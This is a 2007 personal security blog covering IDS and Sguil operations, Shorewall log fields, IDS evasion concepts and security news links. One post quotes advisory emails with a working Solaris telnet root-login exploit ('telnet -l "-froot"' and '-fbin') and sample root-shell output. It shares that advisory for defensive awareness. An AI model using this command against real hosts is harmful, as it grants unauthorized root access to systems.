Wednesday, April 25, 2007

Compromising Windows Vista Security using Vboot Kit

Vbootkit is a bootkit that is able to load from Windows Vista boot-sectors. Vbootkit is developed by Nitin Kumar and Vipin Kumar, security consultant from NV Labs. It is one of Window's Vista bootkit that is used to hijack Vista's booting process right from the beginning. Vbootkit testing was performed on Windows Vista RC1(build 5600) & Windows Vista RC2(build 5744).
If you want to get the vbootkit white-paper and presentation slides, you can visit here:
http://www.nvlabs.in/?q=node/27

Tuesday, April 24, 2007

U.S. Army team wants second chance at Hack In The Box (HITB) Kuala Lumpur???

A team of U.S. Army hackers will attend the Hack In The Box (HITB) Security Conference 2007 in Kuala Lumpur later this year, seeking redemption after falling short at a hacker competition in Dubai earlier this month.
http://www.networkworld.com/news/2007/042407-us-army-team-wants-second.html

I want to see them this year in KL.....

Saturday, April 21, 2007

Port 443

SANS inform that there is a significant increase in port 443 scans. They said if you see attacks against https servers, please let them know. If you see something like that, I think you can send your web server logs/IDS logs/Firewall logs to them to confirm whether there is an attack or not.
http://isc.sans.org/diary.html?storyid=2673

Last year, I got the same problems at my client site. One of my team reported to my Security Consultant that she detected series of Attack Response alerts from our Snort IDS. This alert involves 443 port (https). So we analyzed that alert and checked the source IP because the 443 service comes from that source IP. After analyzing that alert, we confirmed that there is no SSL/https related services available on the source IP. It looks like a normal website. There is no https service available on that IP. If there is https service, it should be encrypted. We want to analyze details and make decision about that alert, but we didn't have more resources. Maybe attacker was compromised earlier and installed backdoor/trojan/malware at that IP and used it to communicate through 443 port? Or maybe misconfiguration?? See this link:
http://blog.hazrulnz.net/121/finally-2.html

From my experience, this question is not easy to answer if you only have Snort alerts. It will make this question too difficult to answer. Looking at the alerts, there is nothing else we can do. You cannot give right answer to this question.

That's why I like to use Sguil. Sguil is an open source suite for performing NSM (Network Security Monitoring). NSM equips security staff to deal with the inevitable consequences of too few resources and too many responsibilities. NSM collects the data needed to generate better assessment, detection, and response processes, resulting in decreased impact from unauthorized activities.

Tuesday, April 03, 2007

Exploiting Microsoft ANI Vulnerability in 10 minutes

Trirat Puttaraksa posted about Microsoft ANI vulnerability and how to exploit it in 10 minutes. He started to write this exploit after doing a lot of researches about Exploiting the ANI vulnerability on Vista, Windows Animated Cursor Stack Overflow Vulnerability and Analysis of ANI “anih” Header Stack Overflow Vulnerability.
http://sf-freedom.blogspot.com/2007/04/ani-again-exploiting-microsoft-ani.html

Sunday, April 01, 2007

Sguil Problem

Today, I got problem with my Sguil machine. When I want to run Sguil script, i got this error, "Table `event` is marked as crashed and should be repaired".















I checked the error message with dmesg to find out the problem:














After that, I'm trying to restart sguild script, but I got same error. At the same time, I remember TaoSecurity posting about MYSQL problem. I try to search from TaoSecurity blog and I found this link:
http://taosecurity.blogspot.com/2007/03/recovering-from-corrupted-mysql.html

I run this mysqlcheck command like this:
izhar/root #mysqlcheck -r sguildb -p
Enter password















After running mysqlcheck, I try to start sguild script again, but it still not working. I reboot my FreeBSD 6.1. and go to maintenance mode. I run fsck command to check file system consistency and interactively repairs the file system:
#fsck














After running fsck command, i reboot my Sguil machine and trying to run again my Sguil. Everything work without any errors. So I can used back my Sguil machine.

Conclusion: Shutdown your Sguil machine properly. Hehehe, yesterday I forgot to shutdown it and immediately closed my VMware Sguil without shutdown it.

Wednesday, March 28, 2007

Metasploit Framework 3.0

The Metasploit Project released new Metasploit Framework 3.0 . The Metasploit Framework is a development platform for creating security tools and exploits. Version 3.0 contains 177 exploits 104 payloads 17 encoders and 3 nop modules. Additionally 30 auxiliary modules are included that perform a wide range of tasks including host discovery protocol fuzzing and denial of service testing. Metasploit organizers describe the framework as suited for use by IT administrators carrying out pen testing and patch installation verification, and product makers testing the security limitations of their technologies, along with its core audience of researchers.
You can download here:
http://framework-mirrors.metasploit.com/msf/download.html

This is an interview with founder of Metasploit, HD Moore about his Metasploit projects.
http://www.securityfocus.com/columnists/439

Sunday, March 18, 2007

An interview with Joanna Rutkowska

This is an interview session with Joanna Rutkowska, a person who hacked the Windows Vista kernel.
http://www.darkreading.com/document.asp?doc_id=119576&f_src=darkreading_default

Last year, I attended her presentation about Subverting Vista Kernel For Fun and Profit at HITBSecConf2006. She shows how to bypass Windows Vista Kernel using BluePills tool. She is one of the researchers who found vulnerability on Vista. You can refer here to get a slide about her Vista presentation at HITBSecConf2006. You also can refer to her blog about her latest research:
http://theinvisiblethings.blogspot.com/

Analysis of Remote File Inclusion Attempts

This is an analysis from SANS diary about Remote File Inclusion attempt:
http://isc.sans.org/diary.html?storyid=2462

Remote file inclusion is one of the latest and popular attack technique used by an attacker to attack a website from a remote computer. If your server are vulnerable to web applications that allow an attacker to execute remote file inclusion, it's very easy for attacker take over your server remotely .

PHP application is one of the applications that always vulnerable which allow an attacker to execute remote file inclusion to website. The reason of this PHP issue are:
  • Insufficient validation of user input prior to dynamic file system calls, such as require or include or fopen()
  • allow_url_fopen and PHP wrappers allow this behavior by default, which is unnecessary for most applications
  • Poor permissions and planning by many hosters allowing excessive default privileges and wide ranging access to what should be off limits areas.
If you want to find more information about PHP remote code execution, you can refer to this:
http://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Execution

Friday, March 09, 2007

TOR: Anonymity Online

Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
You can visit this website to learn more about TOR or download it:
http://tor.eff.org/

Or you can follow this website if you want to learn about installing and configuring TOR:
http://www.irongeek.com/i.php?page=videos/tor-1

Friday, March 02, 2007

Deformed TCP Options - Got Packets?

I got this article from SANS. This is about TCP packet analysis. The analysis said that scan maybe to probe firewall configuration, but it seem the level of crafting involved would be overkilled. I'm still new in packet analysis. I think i sould improve my knowledge aabout TCP packet attack.
http://isc.sans.org/diary.html?storyid=2328

Wednesday, February 28, 2007

Windows Vista Security

Hi all,
I know too many people talk about Windows Vista security. Many security researchers and security professionals still talking about security innovations and features in Windows Vista such as User Account Protection, BitLocker Drive Encryption and EFS, Windows Defender, Windows Firewall, Windows Security Center, Internet Explorer 7, and much more.

You can read about Windows Vista research by Symantec Security Response in order to provide a balanced and objective analysis of these improvements. You can read pdf paper about Security Implication of Windows Vista and blog about Vista Security.

You also can read slide presentation about Windows Vista Security Explained presented by Paul Thurrott, News Editor from Windows IT Pro Magazines.

Saturday, February 24, 2007

Avoid these five common IDS implementation errors

Intrusion Detection Systems can go a long way to keep hackers from penetrating your network. However, they can only work if you properly set them up. Here are five common errors and how you can avoid them:
  • Ignoring frequent false positives
  • Avoiding IPSec to support NIDS
  • Monitoring only inbound connections
  • Using shared network resources to gather NIDS data
  • Trusting IDS analysis to non-expert analysts
You can read full article:
http://articles.techrepublic.com.com/5100-6350-5785230.html

Thursday, February 22, 2007

Cracking Windows Vista Passwords

This article is about cracking Windows Vista passwords using Ophcrack and Cain. You can read full article here:
http://irongeek.com/i.php?page=videos/cracking-windows-vista-passwords-with-ophcrack-and-cain

I cannot test it because i don't have Windows Vista. I think i will try it later...hehehe

Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning , I received email from Dshiled about Solaris Telnet 0-day. The article about this issue:
https://isc.sans.org/diary.html?storyid=2220

You also can read this email:
Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console",
don't
assume that the machine is secure, because the following does work,
and is one step from root:
telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start
kicking...

Email 3:
HD is not 100% accurate. It can be -froot if and only if you have
commented the CONSOLE setting within /etc/default/login . This
setting prevents network logons to root account and is set by
default. However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions. Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

If you try userids with non standard shells such as /bin/false or
one similar to the one in the jass package will also kick the end
user out. Users that have been locked (passwd -l userid ) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.
Scott


That's why i don't like to use Solaris......hehehehe....

Broken Authentication and Session Security

This is an article about Broken Authentication and Session Security. I think this article can be used by penetration tester who want to test user identities, passwords or session mechanisms.
You can refer to full article:
http://www.hackerscenter.com/archive/view.asp?id=27269

Friday, February 02, 2007

'Contact Us' attack takes out mail servers?

The "contact us" feature on many websites is often insecure and makes it easy to launch denial of service attacks on corporate mail servers, according to UK-based security consultancy SecureTest. They said 'Contact Us' forms can be used to launch denial of service attacks through endemic security weaknesses that have largely been overlooked. You can read here.

Five Mistakes of Security Log Analysis

In DoD Cybercrime Conference 2007 in St. Louis, Missouri, Anton Chuvakin gave a talk about the "Five Mistakes of Security Log Analysis". Anton talks about operational security challenges that organizations face while deploying log and alert collection and analysis infrastructure. You can refer here for his simple presentation.
You also can refer to his previous article for Computerworld. I think this article is useful for us. Chuvaking highlights the top five most common mistakes organizations make in this process:
1: Not looking at the logs
2: Storing logs for too short a time
3: Not normalizing logs
4: Failing to prioritize log records
5: Looking for only the bad stuff

p/s: I think NSM is one of the solution for this five mistakes to reduce problems for my IDS that i'm still using it......hehehhee....

Saturday, January 06, 2007

How to analyze Shorewall Log?

Do you know how to analyze firewall log??? For those whore are interested in network security field, understanding firewall logs is extremely valuable to them. Before this, I stated in my previous article about Shorewall Firewall. In that article, I discussed how to setup simple firewall using Shorewall.
In this article, i will show you how to analyze firewall log in Shorewall. Shorewall is one of the high-level tools for Netfilter. This is a simple reference for the format used by the netfilter log messages. Below is a Shorewall log message generated by netfilter:

Dec 5 01:21:37 monitoring12 kernel: Shorewall:net2all:DROP:IN=eth0 OUT= MAC=00:07:e9:f1:9f:85:00:07:e9:f1:a0:85:08:00 src=10.1.2.21 DST=10.1.2.32 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=4923 DF PROTO=TCP SPT=42368 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0

Details in sequence of Shorewall log:
  • Dec 5 01:21:37 monitoring12 kernel: -syslog prefix.
  • Shorewall:net2all:DROP -The Shorewall policy and zones defines in /etc/shorewall/policy. The packet was received from outside Internet (net) to any other network or DMZ zone (all) will dropped.
  • IN=eth0 -Interface where the packet was received from. Empty value means locally generated packets.
  • OUT= -Interface where the packet was sent to. Empty value means locally received packets.
  • MAC=00:07:e9:f1:9f:85:00:07:e9:f1:a0:85:08:00 -Destination MAC: 00:07:e9:f1:9f:85, SourceMAC :00:07:e9:f1:a0:85, Type=08:00 (ethernet frame carried an IPv4 datagram)
  • src=10.1.2.21 -Source IP address
  • DST=10.1.2.32 -Destination IP address
  • LEN=60 -Total length of IP packet in bytes
  • TOS=0x00 -Type Of Service, "Type" field. Increasingly being replaced byDS and ECN. Refer to RFC 791 for IP Header info.
  • PREC=0x00 -Type Of Service, "Precedence" field.Increasingly being replaced by DS and ECN. Refer to RFC 791 for IP Header info.
  • TTL=64 -remaining Time To Live (TTL) is 64 hops.
  • ID=4923 -Unique ID for this IP datagram, shared by all fragments if fragmented.
  • DF -"Don't Fragment" flag.
  • PROTO=TCP -Protocol name or number. Netfilter uses names for TCP,UDP,ICMP, AH and ESP. The other protocols are identified by number. List of protocols in /etc/protocols.
  • SPT=42368 -Source port (TCP or UDP port). Refer to /etc/services for port numbers.
  • DPT=22 -Destination port (TCP or UDP port)
  • WINDOW=5840 -The TCP Receive Window size. This may be scaled by bit-shifting left by a number of bits specified in the "Window Scale" TCP option.
  • RES=0x00 -Reserved bits. Refer to RFC 793 for TCP Header Format info.
  • SYN -SYN flag, only exchanged at TCP connection establishment.
  • URGP=0 - The Urgent Pointer allows for urgent, out of band data transfer.
To analyze firewall logs, you must have strong understanding of TCP/IP such as protocol header information. You need to know IP header format (RFC791), TCP header format (RFC793) and UDP header format (RFC768). I think this is simple or quick reference analysis, not details analysis. But this is a good for me to strengthen my knowledge in firewall analysis.

Wednesday, January 03, 2007

Intrusion Detection System (IDS) Evasion Techniques

In this article, i will share with you how an attacker used their technique to evade Intrusion Detection System (IDS). There are many methods to evade or bypass IDS sensors. There are several common techniques that can be used by an attacker to exploit inherent weaknesses in IDS. IDS evasion not only the process of totally concealing an attack but also a technique to disguise an attack to appear less threatening than it really is.
Anomaly-based IDS will monitor network traffic and compare it against an established baseline. The baseline will identify what is “normal” for that network- what sort of bandwidth is generally used, what protocols are used, what ports and devices generally connect to each other- and alert the administrator or user when traffic is detected which is anomalous, or significantly different, than the baseline.
A signature based IDS will monitor packets on the network and compare them against a database of signatures or attributes from known malicious threats. This is similar to the way most antivirus software detects malware. The issue is that there will be a lag between a new threat being discovered in the wild and the signature for detecting that threat being applied to your IDS. During that lag time your IDS would be unable to detect the new threat.
While anomaly-based IDS systems might detect an unknown attack, most signature-based IDS will miss a new exploit if there is no rule written for it. IDS systems must receive vendor signature updates. Even if updates are applied, exploits that are unknown to the IDS vendor will not be caught by the signature-based system. Attackers may also try to evade the IDS by using their techniques, exploits or tools. These evasive techniques include flooding, fragmentation, encryption, and obfuscation.
  • Flooding- IDSs depend on resources such as memory and processor power to effectively capture packets, analyze traffic, and report malicious attacks. By flooding a network with noise traffic, an attacker can cause the IDS to exhaust its resources examining harmless traffic. In the meantime, while the IDS is distracted and occupied by the volume of noise traffic, the attacker can target its system with little or no intervention from the IDS.
  • Fragmentation-Because different network media allow variable maximum transmission units (MTUs), you must allow for the fragmentation of these transmission units into differently sized packets or cells. Hackers can take advantage of this fragmentation by dividing attacking packets into smaller and smaller portions that evade the IDS but cause an attack when reassembled by a target host.
  • Encryption-Network-based intrusion detection (covered later in this chapter) relies on the analysis of traffic that is captured as it traverses the network from a source to its destination. If a hacker can establish an encrypted session with its target host using Secure Shell (SSH), Secure Socket Layer (SSL), or a virtual private network (VPN) tunnel, the IDS cannot analyze the packets and the malicious traffic will be allowed to pass. Obviously, this technique requires that the attacker establish a secure encrypted session with its target host.
  • Obfuscation-Obfuscation, an increasingly popular evasive technique, involves concealing an attack with special characters. It can use control characters such as the space, tab, backspace, and Delete. Also, the technique might represent characters in hex format to elude the IDS. Using Unicode representation, where each character has a unique value regardless of the platform, program, or language, is also an effective way to evade IDSs. For example, an attacker might evade an IDS by using the Unicode character c1 to represent a slash for a Web page request.
This article discussed about some of the techniques used by an attacker to evade IDS. There are many other technique used by an attacker to minimize IDS alarm when a given packet or sequence of packets matches the characteristics of known attack. I hope this article will help you understand how an attacker used his technique to attack a system or network without triggered by IDS.

Monday, January 01, 2007

GMail Vulnerable To Contact List Hijacking

The is a vulnerability in GMail contact. By using cross site scripting, it's easy to steal a GMail user’s contact list if you visit a certain type of website. The attack is simple, you have to be logged in to GMail at the time of the attack. Visit this website for more information about this vulnerability:
http://cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/

Firewall Basics

This article is intended to help those newbies to firewalls. It's for people who want to learn and understand about definition of firewall, firewall terminology and types of firewalls. You can read here:
http://hackerscenter.com/archive/view.asp?id=26865